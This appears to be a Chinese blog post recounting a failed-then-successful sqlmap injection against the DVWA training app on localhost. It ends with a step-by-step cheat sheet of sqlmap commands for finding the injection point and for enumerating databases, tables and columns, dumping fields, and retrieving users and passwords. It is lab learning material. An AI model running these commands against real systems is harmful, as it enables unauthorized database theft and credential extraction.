真好,一个sqlmap注入问题困扰我一周,最后发现命令给错了。

事情是这样子的:
利用sqlmap对DVWA中Low进行SQL注入

输入: python sqlmap.py -u http://127.0.0.1/DVWA-master/vulnerabilities/sqli/?id=1

报错:不可注入…提示

后来我根据提示中的命令重新输入了一次,发现还是有问题(单独加cookie也不行)

吐了呀,一直以为环境有问题,sqlmap和python又重装了一遍。
然后用kali虚拟机注入,都一样结果。

直到今天,用一个带上一个响应包注入成功了
?

切记: sqlmap.py -u 后面是跟URL
sqlmap.py -r 后面是跟响应数据
sqlmap进行注入时,最好使用-r

最后再复习一下sqlmap注入命令:

1、是否存在注入点

python sqlmap.py -r “响应包路径”

2、获取注入点所有数据库

python sqlmap.py -r “响应包路径” --dbs

3、获取当前使用的数据库

python sqlmap.py -r “响应包路径” --current-db --batch

4、获取数据库中的表

python sqlmap.py -r “响应包路径” --table -D “数据库名” --batch

5、获取表中的字段信息

python sqlmap.py -r “响应包路径” --columns -T “表名” -D “获取的数据库名” --batch

6、获取字段具体信息

python sqlmap.py -r “响应包路径” --dump -C “字段名(可多个)” --columns -T “表名” -D “数据库名” --batch

7、当前使用的账户

python sqlmap.py -r “响应包路径” --current-user

8、列出所有使用过的账户

python sqlmap.py -r “响应包路径” –users

9、
mysql的登录账户和密码

python sqlmap.py -r “响应包路径” –passwords

sqlmap问题及解决办法相关推荐

  1. 遇到的Exception/error及解决办法记录汇总

    一.java.net.SocketException 1.java.net.SocketException:Connection reset 首先,如果一端的Socket被关闭(或主动关闭,或因为异常 ...

  2. java enumerator_java 中遍历取值异常(Hashtable Enumerator)解决办法

    java 中遍历取值异常(Hashtable Enumerator)解决办法 用迭代器取值时抛出的异常:java.util.NoSuchElementException: Hashtable Enum ...

  3. dev c++ 调试时候发生软件崩溃解决办法

    dev c++ 调试时候发生软件崩溃解决办法 安装好dev cpp,准备调试的时候发现软件崩溃,这种情况很好解决.只要在工具菜单中点开编译选项,找到代码生成/优化一栏,将链接器的"产生调试信 ...

  4. js ajax 递归,javascript ajax循环请求/ 长轮询终极解决办法——递归

    ajax循环请求,不能使用for循环,原因如下: 1. 因为ajax是异步执行,在还没有拿到服务器响应内容,就进入下一个for循环中 解决办法:递归currentIndex = 0; function ...

  5. hive mysql 不兼容_Hive+mySql遇到的问题和解决办法

    问题1: Exception in thread "main" java.lang.RuntimeException: org.apache.hadoop.ipc.RemoteEx ...

  6. 微信小程序wx.request POST获取不到数据解决办法

    get //发起请求     wx.request({       url: 'http://www.xiaochengxu.com/home/index/curd', //仅为示例,并非真实的接口地 ...

  7. 主机/服务器某端口被占用及解决办法

    1.端口的概念 在网络技术中,端口(Port)包括逻辑端口和物理端口两种类型.物理端口指的是物理存在的端口,如ADSL Modem.集线器.交换机.路由器上用 于连接其他网络设备的接口,如RJ-45端 ...

  8. 关于HttpClient上传中文乱码的解决办法

    使用过HttpClient的人都知道可以通过addTextBody方法来添加要上传的文本信息,但是,如果要上传中文的话,或还有中文名称的文件会出现乱码的问题,解决办法其实很简单: 第一步:设置Mult ...

  9. 使用hibernate与mysql时数据不能插入的原因及解决办法

    1.背景 之前从没用过hibernate,因此在网上搜了一下hibernate快速入门方面的信息,最后我按照<Myeclipse Hibernate 快速入门 中文版>(CSDN,百度文库 ...

最新文章

  1. Maven(插件配置和生命周期的绑定)
  2. 开源智能手机 Librem 5 跳票了,推迟至第3季度发布
  3. 【模板】Dijkstra
  4. 目的港无人提货的法律风险及风险承担
  5. java ajax 获取headers_jquery ajax 怎么获得返回的response headers
  6. github和dockerhub制作k8s镜像
  7. vector 、map 、iterator 之学习笔记
  8. 如何从0-1制作数据大屏,我用大白话给你解释清楚了
  9. Android 10 正式版本或将于 9 月 3 日推出
  10. java实验二 类和对象
  11. php画弧,75、PHP图像处理之画圆、弧线、网站饼状统计图绘制
  12. 【机器学习15】决策树模型详解
  13. 教你学习JavaScript的this入门到进阶最全用法
  14. android partition tool apk,分区修复工具 MiniTool Partition Recovery
  15. 傲梅备份服务器系统,傲梅轻松备份迁移系统
  16. CSS星星闪烁流星划过动画特效
  17. 乘法鉴相器的matlab仿真,种用MATLAB仿真锁相环方法.PDF
  18. bmi计算器公式_BMI 计算器
  19. Spring Spring-data-redis 实现的消息队列
  20. open images 类别名中英文对照

热门文章

  1. 关于java中boolean的使用
  2. Oracle-实现Boolean类型字段
  3. Python爬虫教程-Python爬取股票数据过程详解
  4. multisim信号采集及回放、文氏电桥正弦波
  5. Vungle 视频广告接入踩坑记
  6. php校园二手旧书捐赠回收系统毕业设计
  7. 【DeepLearning 文本分类实战】IMDB Data Preprocessing数据预处理
  8. 什么是公钥,,什么是密钥啊 ?有什么区别吗?
  9. QNX APS自适应分区调度
  10. 敏捷绩效管理三剑客:OKR 、KPI、CFR